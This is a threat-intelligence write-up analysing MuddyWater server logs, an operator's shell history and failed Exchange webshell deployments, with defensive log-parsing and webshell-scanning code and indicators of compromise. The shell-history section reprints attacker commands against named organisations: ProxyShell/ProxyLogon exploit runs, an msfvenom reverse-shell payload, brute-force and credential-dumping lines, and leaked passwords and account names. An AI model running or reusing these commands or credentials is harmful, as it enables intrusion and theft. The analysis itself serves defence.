
Overview

This page analyzes server logs and operational history recovered from MuddyWater infrastructure, including the AMEEN ALKHALIJ WordPress server logs, operator shell history, and failed operation logs.

AMEEN ALKHALIJ Server Logs

Server Information

Log File: ameen-alkhalij.nu.log
Domain: ameen-alkhalij.nu
Server Type: WordPress hosting (likely compromised infrastructure)
Log Period: January 8-9, 2025
Total Entries: 250+ entries (truncated at line 250)

Attack Pattern Analysis

WordPress Exploitation Attempts

The server logs show extensive automated scanning and exploitation attempts against WordPress installations.
Setup Config Scanning (Primary Pattern):
GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404
GET /wp-admin/setup-config.php HTTP/1.1" 409
Timeline of setup-config.php Attempts:
  • Jan 8, 18:06 - 23:48: 38 attempts from various Cloudflare IPs
  • Jan 9, 00:09 - 11:56: Continued attempts every 15-20 minutes
  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Response Codes:
  • 404: WordPress not installed at that path
  • 409: Setup already configured (WordPress exists)

XML-RPC Exploitation

Between 04:39 and 04:43 on January 9, a concentrated XML-RPC attack occurred.
Attack Details:
Source IP: 152.42.193.218
Timestamp: 09/Jan/2025:04:39:00 - 04:43:58
Requests: 100+ POST requests to /xmlrpc.php
Interval: Every 3-4 seconds
Response: 200 415 (Method not allowed)
Attack Sequence:
  1. HEAD /xmlrpc.php - Check if XML-RPC is enabled
  2. GET /wp-json/wp/v2/users - Enumerate WordPress users
  3. 100+ POST /xmlrpc.php attempts - Brute force authentication
Related File Probing:
HEAD /wp/xmlrpc.php HTTP/1.1" 404
HEAD /wordpress/xmlrpc.php HTTP/1.1" 404
HEAD /old/xmlrpc.php HTTP/1.1" 404
HEAD /new/xmlrpc.php HTTP/1.1" 404
HEAD /blog/xmlrpc.php HTTP/1.1" 404

Login Page Scanning

Multiple attempts to locate WordPress login pages.
Pattern:
152.42.193.218 - "GET /wp-login.php HTTP/1.1" 404
188.166.250.145 - "GET /wp-login.php HTTP/1.1" 404
128.199.157.221 - "GET /wp-login.php HTTP/1.1" 404

Reconnaissance Activities

Bot Traffic Analysis

Applebot Crawler:
17.241.75.192 - "GET /robots.txt HTTP/1.1" 404
17.241.75.192 - "GET / HTTP/1.1" 444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1)
Serpstatbot SEO Crawler:
195.201.12.243 - "GET /robots.txt HTTP/1.1" 404
195.201.12.243 - "GET / HTTP/1.1" 444
User-Agent: serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/)

Security Scanning

Hosting Scan (likely security researcher):
62.210.90.209 - "HEAD / HTTP/1.1" 444 - curl/7.81.0
62.210.90.209 - "GET / HTTP/1.1" 444
62.210.90.209 - "GET /favicon.ico HTTP/1.1" 404
62.210.90.209 - "GET /ads.txt HTTP/1.1" 404
62.210.90.209 - "GET /app-ads.txt HTTP/1.1" 404
62.210.90.209 - "GET /sellers.json HTTP/1.1" 404
CMS Detection Attempts:
165.227.163.36 - "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 - python-requests/2.18.4
165.227.163.36 - "GET /administrator/index.php HTTP/1.1" 404 - python-requests/2.18.4
165.227.163.36 - "GET /misc/ajax.js HTTP/1.1" 404 - python-requests/2.18.4

Source IP Analysis

Top Attacking IPs:
IP Address              | Organization | Request Count | Activity Type
152.42.193.218          | Unknown      | 100+          | XML-RPC brute force
172.69.x.x, 172.71.x.x  | Cloudflare   | 50+           | Setup-config scanning
162.158.x.x             | Cloudflare   | 30+           | Setup-config scanning
141.101.x.x             | Cloudflare   | 20+           | Setup-config scanning
188.166.250.145         | DigitalOcean | 3             | wp-login scanning
Geographic Distribution:
  • Primary traffic: Cloudflare CDN (multiple /16 blocks)
  • Secondary: Direct IP attacks from hosting providers
  • Reconnaissance: Search engine bots and security scanners

Server Response Patterns

HTTP Response Code Distribution:
  • 404: File/path not found (majority of responses)
  • 409: WordPress already configured
  • 444: Nginx reject (blocked requests)
  • 405: Method not allowed (XML-RPC)
  • 200 415: XML-RPC endpoint exists but rejects method
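As an added example (not part of the original analysis), a small parser that flags the three patterns described above in combined-format access logs: setup-config.php probes with the status codes they drew, wp-login.php probing, and bursts of POST /xmlrpc.php from a single client. The sample lines are constructed to resemble the excerpts above, and the burst threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime
# Combined log format: client, identd, user, [timestamp], "request line", status, size, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def parse(log_text):
    """Yield one dict per line that matches the combined format; skip anything else."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            rec["path"] = rec["path"].split("?", 1)[0]   # ignore any query string
            yield rec

def analyze(log_text, burst_threshold=4, window_s=60):
    """Flag the three patterns described above, keyed by client IP."""
    setup_probes = defaultdict(set)   # ip -> status codes returned for setup-config.php
    login_probes = defaultdict(int)   # ip -> number of /wp-login.php requests
    xmlrpc_posts = defaultdict(list)  # ip -> timestamps of POST /xmlrpc.php
    for r in parse(log_text):
        if r["path"].endswith("/wp-admin/setup-config.php"):
            setup_probes[r["ip"]].add(r["status"])
        elif r["path"].endswith("/wp-login.php"):
            login_probes[r["ip"]] += 1
        elif r["path"].endswith("/xmlrpc.php") and r["method"] == "POST":
            xmlrpc_posts[r["ip"]].append(r["ts"])
    # A burst is burst_threshold or more POSTs from one IP inside any window_s seconds.
    bursts = {}
    for ip, stamps in xmlrpc_posts.items():
        stamps.sort()
        for i in range(len(stamps) - burst_threshold + 1):
            if (stamps[i + burst_threshold - 1] - stamps[i]).total_seconds() <= window_s:
                bursts[ip] = len(stamps)
                break
    return {"setup_config": dict(setup_probes), "wp_login": dict(login_probes),
            "xmlrpc_bursts": bursts}
# Constructed sample modelled on the excerpts above (not lines copied from the real log).
SAMPLE_LOG = """\
172.69.1.10 - - [08/Jan/2025:18:06:01 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 409 0 "-" "Mozilla/5.0"
172.71.2.20 - - [08/Jan/2025:18:21:17 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
188.166.250.145 - - [09/Jan/2025:02:10:44 +0000] "GET /wp-login.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
152.42.193.218 - - [09/Jan/2025:04:39:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0"
152.42.193.218 - - [09/Jan/2025:04:39:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0"
152.42.193.218 - - [09/Jan/2025:04:39:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0"
152.42.193.218 - - [09/Jan/2025:04:39:14 +0000] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Mozilla/5.0"
"""
```

On the real log the threshold would be raised to match the observed rate (100+ POSTs in about five minutes), and a 409 from setup-config.php is worth alerting on by itself because it confirms to the scanner that WordPress is installed.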

ZSH History Analysis

Operator Profile

Shell File: zsh_history.txt
Hostname: Unknown (the username “luki” appears in /home/luki paths)
Operating System: Linux (likely Kali Linux or Parrot OS)
Command Count: 1,369 commands (truncated)
Activity Period: Extended reconnaissance and exploitation campaign

Toolset and Capabilities

Reconnaissance Tools

Subdomain Enumeration:
subfinder -d dubaipolice.ae
subfinder -d iaa.gov.il -o iaasubs.txt
subfinder -d epc.ae
subfinder -d moi.gov.af
subfinder -d jazz.com.pk
Network Scanning:
nmap -Pn 94.56.228.229
nmap -vvv -Pn --open -p 3389,445,139,21,22,1433,3306 193.188.64.0/24
nbtscan -r 91.151.128.0/24
DNS Reconnaissance:
dig +short dubaipolice.ae
host 94.56.228.68
whois epc.ae
dnsenum mcit.gov.af
Web Scanning:
ffuf -w fuzz.txt -u https://www.epc.ae/FUZZ
whatweb 94.56.113.142
wpscan --url https://www.emaratech.ae --enumerate p

Exploitation Tools

ProxyShell Exploitation:
git clone https://github.com/Udyz/proxyshell-auto.git
python3 proxyshell.py -t 123.243.161.131
python3 proxyshell.py -t mail.unitech.com.az
python3 exchange_proxyshell.py -u 5.195.4.53 -e [email protected]
Metasploit Framework:
sudo msfconsole
use scanner/smb/smb_version
msfvenom -p java/jsp_shell_reverse_tcp LHOST=88.80.145.107 LPORT=4444 -f raw >a.jsp
SMB/RDP Attacks:
enum4linux -a 185.203.230.44
smbclient -L \\\\5.195.73.65\\
ncrack -u administrator -P aePassword.txt ftp://94.56.88.66
medusa -h 5.195.73.65 -u Administrator -P /home/luki/10k.txt -M smbnt
SQL Injection:
sqlmap -r /home/luki/sql-target/lametayel.co.il.txt -p node_map_id --technique=B --dbms=mysql
sqlmap -u carsforum.co.il/cars/CfAutocomplete/HitSearch?sentence=1 -p sentence

Target Countries and Organizations

The shell history reveals systematic targeting of multiple countries:

United Arab Emirates (UAE)

subfinder -d dubaipolice.ae
subfinder -d daa.gov.ae
subfinder -d emaratech.ae
subfinder -d du.ae
nmap -Pn 94.56.228.68  # Dubai IP range
nmap -Pn 213.42.84.0/24  # UAE range
UAE Specific Commands:
  • Dubai Police Lab: subfinder -d dubaipolicelab.ae
  • Emirates Identity Authority: nmap -Pn emaratech.ae
  • Dubai Chamber: subfinder -d dubaichamber.com
  • RTA Dubai: ffuf -u https://login.rta.ae/FUZZ

Afghanistan

subfinder -d mof.gov.af  # Ministry of Finance
subfinder -d mod.gov.af  # Ministry of Defense
subfinder -d aop.gov.af  # Attorney General's Office
subfinder -d moi.gov.af  # Ministry of Interior
subfinder -d mfa.gov.af  # Ministry of Foreign Affairs
nmap -Pn mail.roshan.af  # Roshan Telecom

Pakistan

subfinder -d jazz.com.pk
nmap -sV -sC pakirsa.gov.pk
subfinder -d dgip.gov.pk
nmap -Pn 202.83.172.0/24

Israel

subfinder -d iaa.gov.il  # Israel Airports Authority
cat iaasubs.txt | dnsx -silent
sqlmap targets: lametayel.co.il, carsforum.co.il

Saudi Arabia

ffuf -u http://fun.sa.zain.com/FUZZ
nmap -Pn reports.aas.com.sa
ffuf -u https://email.aljaziracapital.com.sa/owa/auth/FUZZ

Lebanon

subfinder -d alfamobile.com.lb
nmap -Pn mail.general-security.gov.lb
ffuf -u https://pcm.gov.lb/FUZZ  # Prime Minister's Office

Jordan

subfinder -d gov.jo
subfinder -d gfmis.gov.jo  # Government Financial Management System

Turkey

subfinder -d turktelekom.com.tr
amass enum -src -brute -recursive 2 -d turktelekom.com.tr

Kuwait

cat kw-targets.txt  # Various Kuwaiti targets

Georgia

nmap -Pn ftp.geocell.ge
whois silk.ge
cat ex-rda.txt  # Exchange servers: exchange-01.moa.gov.ge

Armenia

subfinder -d mfa.am  # Ministry of Foreign Affairs
nmap -Pn mail.e-citizen.am

Credential Management

Password Lists Used:
cat joker-pass.txt
cat total-ae-pass.txt  # UAE-specific passwords
cat plistpub.txt
grep 'Gh@dyismyfirsts0n' joker-pass.txt
grep 'P@' joker-pass.txt
User Lists:
cat user.txt
echo administrator >>user.txt
echo sa >>sqluser.txt  # SQL Server accounts
echo Administrator >user.txt
echo admin >>user.txt
Specific Credentials Searched:
  • Gh@dyismyfirsts0n
  • N!cecare
  • mobily@123
  • Xdxbsystem6337X
Target Accounts Identified:
  • Saudi Arabia: t.alzahrani.dar, svc-win48, bmcpatrol
  • Lebanon: SCANSAIDA, ELIEGE, jacqueshad, bechirbad

Network Infrastructure

C2 and Proxy Infrastructure:
ssh -N -L 192.168.10.107:443:127.0.0.2:443 -p 443 [email protected]
ssh -N -L 192.168.10.107:8080:127.0.0.2:8080 -p 443 [email protected]
Compromised Infrastructure:
  • 88.80.145.122 - SSH tunnel/proxy
  • 103.57.251.31:3512 - SOCKS5 proxy
Port Forwarding:
nc -lvnp 5555  # Reverse shell listener
nc -lvnp 49455
nc -lvnp 4444

Post-Exploitation Activities

Lateral Movement:
rpcclient -U "" -N 5.195.73.65
smbclient //5.195.73.65/IPC$ -N
smbclient //5.195.73.65/C$ -N
smbmap -H 5.195.73.65
Data Exfiltration:
smbclient -L \\\\213.42.128.30
type \\\\10.20.105.21\\C$\\windows\\temp\\Crashpad\\log.txt
dir \\\\10.20.106.60\\C$\\users
Credential Dumping:
samdump2 SAM SYSTEM
wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c ..."

Vulnerability Exploitation

ProxyShell (CVE-2021-34473, CVE-2021-34523):
python3 proxyshell.py -t 41.138.49.2
python3 exchange_proxyshell.py -u https://41.138.49.2
python3 proxyshell.py -t https://88.80.145.107
ProxyLogon:
git clone https://github.com/praetorian-inc/proxylogon-exploit.git
python exploit.py --frontend https://mail.moe.gov.ae --email Aimie.Hamer --webshell shell.aspx
CVE-2024-21762:
git clone https://github.com/BishopFox/cve-2024-21762-check.git
SMB Vulnerabilities:
nmap -p445 --script smb-vuln-ms17-010 89.237.189.59
nmap --script smb-vuln* -p139,445 -T4 -Pn 89.237.190.197

Shell Failure Log Analysis

Failed Deployment Tracking

Log File: ea3e059ca58eec16a98691bcae372170d83b97c0_Shell failed.txt
Total Failed Attempts: 49 documented failures across multiple countries

Failure Distribution by Country

Austria (At):
185.50.235.189    https://185.50.235.189/owa/auth/msfuj.aspx
80.109.157.74     https://80.109.157.74/owa/auth/webclient.aspx
80.120.41.94      https://80.120.41.94/aspnet_client/wsrnt.aspx
80.121.245.134    https://80.121.245.134/aspnet_client/dggle.aspx
81.223.143.210    https://81.223.143.210/aspnet_client/maggb.aspx
Germany (De):
37.24.200.74      https://37.24.200.74/aspnet_client/system_web/webclient.aspx
185.40.175.36     https://185.40.175.36/aspnet_client/spryc.aspx
213.252.16.62     https://213.252.16.62/owa/auth/Current/scripts/premium/abaak.aspx
156.67.54.90      https://156.67.54.90/owa/auth/OutlookOU.aspx
87.191.224.147    https://87.191.224.147/aspnet_client/pmkqm.aspx
Analysis: The failed attempts are ProxyShell exploitation against Exchange servers in which the webshell was uploaded but no connection to it could be established.

Webshell Naming Convention

Failed deployments reveal webshell naming patterns.
Random 5-character names:
  • msfuj.aspx, wsrnt.aspx, dggle.aspx, maggb.aspx, hoqea.aspx
  • loolm.aspx, vpsem.aspx, spryc.aspx, pmkqm.aspx, abaak.aspx
System-themed names:
  • webclient.aspx (appears 5 times)
  • OutlookOU.aspx (appears 4 times)
  • errorFE.aspx
  • system_web/webclient.aspx
Randomized long names:
  • Vw8q1tdLy.aspx, fUMBz0mwHC.aspx, BTiuzWgu.aspx
  • g1t4YBfJJ.aspx, 0vPiLDQcfJDR.aspx, dYeuy3CETD.aspx

Deployment Paths

Webshells were uploaded to two primary locations, one of them with a nested subdirectory:
  1. /owa/auth/ (OWA frontend)
  2. /aspnet_client/ (ASP.NET client scripts directory)
  3. /aspnet_client/system_web/ (nested system directory)
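The naming patterns and deployment paths above translate directly into a file-system check for defenders. As an added example (not code from the original analysis), a scanner over an Exchange web-root listing that flags every .aspx file under /owa/auth/ or /aspnet_client/ that is not in a baseline and labels its name style the way the section above does. The baseline allowlist, the name-style regexes and the sample listing are assumptions constructed for this example.

```python
import re
from pathlib import PurePosixPath
# The two deployment roots named above; any .aspx file beneath them is examined.
WATCHED_ROOTS = ("/owa/auth/", "/aspnet_client/")
# Illustrative allowlist for /owa/auth/ (an assumption: build the real baseline from a clean
# install of the same Exchange build, never from the suspect host itself).
OWA_AUTH_BASELINE = {"logon.aspx", "logoff.aspx", "signout.aspx", "timeoutlogout.aspx"}
# Names from the failure log that imitate legitimate components (compared case-insensitively).
SYSTEM_THEMED = {"webclient.aspx", "outlookou.aspx", "errorfe.aspx"}
RANDOM_5 = re.compile(r"^[a-z]{5}\.aspx$")            # msfuj.aspx, wsrnt.aspx, ...
RANDOM_LONG = re.compile(r"^[A-Za-z0-9]{8,12}\.aspx$")  # Vw8q1tdLy.aspx, BTiuzWgu.aspx, ...

def name_style(name):
    """Classify a suspect file name using the categories from the naming-convention section."""
    if name.lower() in SYSTEM_THEMED:
        return "system-themed"
    if RANDOM_5.match(name):
        return "random-5"
    if RANDOM_LONG.match(name):
        return "random-long"
    return "other"

def classify(path):
    """Return (style, path) for a non-baseline .aspx file in a watched root, else None."""
    p = PurePosixPath(path)
    if p.suffix.lower() != ".aspx":
        return None
    root = next((r for r in WATCHED_ROOTS if path.lower().startswith(r)), None)
    if root is None:
        return None
    # /aspnet_client/ holds client scripts, not .aspx pages, so only /owa/auth/ gets an allowlist.
    if root == "/owa/auth/" and p.name.lower() in OWA_AUTH_BASELINE:
        return None
    return name_style(p.name), path

def scan(listing):
    """Run classify() over a directory listing and return the flagged entries in order."""
    return [hit for hit in map(classify, listing) if hit]

# Constructed listing of an Exchange web root; the webshell names are the ones reported above.
SAMPLE_LISTING = [
    "/owa/auth/logon.aspx",
    "/owa/auth/15.1.2507/themes/resources/logon.css",
    "/owa/auth/msfuj.aspx",
    "/owa/auth/OutlookOU.aspx",
    "/owa/auth/Current/scripts/premium/abaak.aspx",
    "/aspnet_client/system_web/4_0_30319/WebForms.js",
    "/aspnet_client/system_web/webclient.aspx",
    "/aspnet_client/Vw8q1tdLy.aspx",
    "/ecp/default.aspx",
]
```

A hit tagged "other" still deserves a look: it only means the name does not match the three styles seen in this log, not that the file is legitimate.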

Operational Timeline

Phase 1: Reconnaissance (Continuous)

  • Subdomain enumeration of government domains
  • Port scanning of /24 and /16 network ranges
  • Service version detection
  • Vulnerability scanning

Phase 2: Initial Access (2022-2025)

  • ProxyShell exploitation campaigns
  • Webshell deployment
  • Initial credential harvesting

Phase 3: Persistence (Ongoing)

  • BellaCiao backdoor deployment
  • Service-based persistence mechanisms
  • Establishment of SSH tunnels

Phase 4: Lateral Movement (Active)

  • WMI-based remote execution
  • SMB network share enumeration
  • Credential reuse across networks

Phase 5: Collection (Current)

  • Log file exfiltration
  • Credential dumping
  • Network mapping

Key Findings

  1. Infrastructure Abuse: Compromised WordPress server used for C2 or staging
  2. Automation: Extensive use of automated scanning and exploitation tools
  3. Persistence: Multiple backup C2 domains (twittsupport.com, msn-center.uk)
  4. Operational Security: Use of SSH tunnels and SOCKS proxies for anonymity
  5. Target Profile: Government entities and critical infrastructure in the Middle East
  6. Credential Reuse: Harvested credentials used across multiple organizations
  7. Failed Operations: 49 documented failed webshell deployments indicating detection or defensive measures

Indicators of Compromise

Domains

  • twittsupport.com (BellaCiao C2)
  • msn-center.uk (BellaCiao C2 backup)
  • ameen-alkhalij.nu (Compromised infrastructure)

File Paths

  • C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
  • C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.exe
  • C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
  • /owa/auth/*.aspx
  • /aspnet_client/*.aspx

Service Names

  • “Java Update Services”
  • “Microsoft Exchange Services Log”

Network Indicators

  • Port 8000 (BellaCiao webserver)
  • Port 9090 (local forwarding)
  • Port 49450 (RDP forwarding)
  • SSH on port 443 (tunnel establishment)
